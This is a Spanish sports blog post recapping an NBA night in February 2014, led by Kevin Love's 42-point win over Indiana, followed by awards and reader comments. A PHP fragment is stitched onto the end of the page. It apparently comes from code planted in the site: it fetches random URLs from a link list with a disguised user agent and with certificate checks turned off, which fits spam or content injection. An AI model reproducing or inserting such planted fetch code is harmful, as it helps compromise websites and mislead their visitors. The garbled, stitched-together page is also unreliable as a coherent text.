La Crónica: Exhibición y victoria de Kevin Love

20 de February de 2014 por Simon

Otro jueves más traemos el resumen de la habitual maratoniana jornada que la NBA suele preparar el día anterior. Que no se nos pase que entre tanto partido hubo un cambio trascendente en la zona de la élite de la liga y es que los Pacers ya no tienen el mejor balance. Ese honor es de los Thunder aunque ayer no jugaran. Efectivamente, Indiana cayó anoche en Minnesota gracias principalmente a la exhibición de Kevin Love y las 17 asistencias de Ricky Rubio. Estamos acostumbrados a estas exhibiciones por parte del ala-pívot de los Wolves pero  no tanto a que vengan acompañadas de victorias. La fiesta fue completa en Minnesota porque dominaron de principio a fin a los líderes de la liga sin  dos titulares lo que da muestras del potencial de este equipo que un año más no están convirtiendo en muchas victorias (91-104).

Sin embargo, el partido de la jornada era la visita de los Spurs al Moda Center de Portland. Desgraciadamente el encuentro llegaba descafeinado por tanta baja importante en ambos equipos. Los Spurs, además de las bajas de Parker y Leonard, no contaron con Duncan por descanso mientras que los Blazers perdían por lesión a su mejor jugador y gran protagonista de la temporada, Lamarcus Aldridge. Aún así el partido no decepcionó y ambos equipos ofrecieron un buen espectáculo y un partido igualado. Los Blazers comandaron todo el partido con ventajas ligeras hasta que un parcial de 10-0 al inicio del último cuarto dio la vuelta al marcador y permitió a los Spurs ponerse por delante y ganar en el apretado final (111-109). 

El más inmediato perseguidor de San Antonio es actualmente Houston Rockets que ayer logró su octava victoria consecutiva a costa de unos Lakers que apenas opusieron resistencia. Por momentos parecía que ambos equipos estaban todavía en el All-Star por la intensidad defensiva, o más bien por la falta de ella. Era la primera visita de Dwight Howard a los Lakers tras su huída y hay que decir que se le vio especialmente motivado (134-108). De todos modos, la noticia del día para Lakers ayer fue el traspaso de Steve Blake a Golden State Warriors a cambio de Marshons Brooks y Kent Bazemore, dos jugadores jóvenes y con cierto potencial que apenas han tenido oportunidades esta temporada. Precisamente los Warriors jugaron ayer y ganaron a domicilio y sin muchos problemas a Sacramento Kings que sin Demarcus Cousins apenas pudieron plantar cara (101-92).

La jornada de ayer sirviótambién para que se apretaran aún más las cosas en los puestos de Playoffs del Este. El equipo con mejor record del grupo, los Raptors, perdieron y el resto de equipos de ese tren ganaron excepto unos Hawks que siguen en caída libre. Toronto fue derrotados en su casa por los Bulls que se acercan aún más al tercer puesto de la conferencia. Chicago llevó siempre la iniciativa en el marcador pero un gran último cuarto de los Raptors apretó el marcador hasta el punto de que DeRozan tuvo ataque para ganar el partido. Una enorme defensa de Jimmy Butler desbarató definitivamente las opciones de los canadienses (94-92). Los Nets ascendieron otro escalón y se colocan sextos tras vencer a domicilio a Utah Jazz (105-99). El Wizards vs  Hawks terminó con victoria visitante. Atlanta está atravesado su peor momento de la temporada y ayer perdió su séptimo partido consecutivo. Por su parte, los de la capital, con 7 jugadores en dobles dígitos de anotación, rompieron una racha de 3 derrotas seguidas (114-97). Con tanta derrota de los Hawks incluso los Bobcats están en disposición de escalar puestos en las próximas jornadas si no reaccionan. Ayer dieron buena cuenta por segunda noche consecutiva de los Pistons de Detroit y ponen tierra de por medio ante los que son precisamente sus más inmediatos perseguidores (98-116).

En el resto de partidos de la jornada, los Suns vencieron a  Boston Celtics (94-100), los Cavs lograron su sexta victoria consecutiva ante los Magic (93-101) y los Knicks vencieron a domicilio a los Pelicans con 42 puntos de Anthony (98-91).

PREMIOS

MVP:  42 puntos, 16 rebotes y victoria. Esta vez nadie le discute el galardón a Kevin Love. Algo más lejos aparecen los 29 puntos, 6 rebotes, 11 asistencias y 4 robos de James Harden.

Rookie: Tim Hardaway Jr. sigue con su buena racha tras el All Star. Ayer anotó 16 puntos.

Sorpresa: Elton Brand volvió a convertirse en ‘Mr.20-10’ a pesar de la derrota de su equipo. Acabó con 20 puntos y 11 rebotes. Tyler Zeller completó otro buen partido como center titular de Cleveland: 16 puntos, 6 rebotes y 3 tapones.

Decepción: Hace un par de días Andre Drummond capturó 22 rebotes ante los Bobcats pero ayer se quedó en 6 y sólo anotó 8 puntos. Los locales encontraron la forma de pararle.

Esfuerzo en vano: Esta vez los 35 puntos y 11 rebotes  no sirvieron para llevarse la victoria, algo a lo que no está muy acostumbrado Paul George.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

3 comentarios a esta entrada

  1. rumbero dice:
    #1

    Noah promedia 7 asistencias en los últimos 10 partidos y 9 en los últimos 5. Casi nada. La verdad es que está a un nivel superlativo desde que se fue Deng. Y otro que está ayudando aunque no se hable mucho por sus números es Jimmy Butler. No empezó demasiado fino, con un par de lesiones que lo tuvieron parado y sin permitirle coger demasiado ritmo, pero lleva ya un mes más que bueno. Otra cosa son las minutadas que le hace jugar Thibs. No baja de 40 min y casi siempre siendo el stopper de la estrella rival.

    Iba a hablar de los Pistons y de esa oportunidad perdida en el back to back contra los Bobcats que estaban justo por encima en la octava posición, pero lo han hecho tan rematadamente mal que da pereza.

      Citar

  2. Esteban dice:
    #2

    7 puntos y 9 rebotes para BENNETT, 2/8 en cancha en 16 minutos, nada del otro mundo pero mucho mejor q su inicio

    parece poco, pero esta camadas de rookies, no es facil entontrar alguien que baje 9 rebotes, eso lo dice todo

      Citar

  3. Ruxixon dice:
    #3

    Y récord de la franquicia en asistencias para Ricky,aunque creo que empatado con otros,mínimo con Chauncey Billups.Últimamente le he dado mucha cera a los lobos pero ayer Indiana y ellos mismos han puesto de su parte para una victoria fácil.El primer cuarto del partido es el resumen del mismo,un Ricky repartiendo a su gusto,un Love dominador y con muchísimos robos de balón y anotando al contraataque.De todas formas mucho tendrán que trabajar para colarse en la postemporada.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>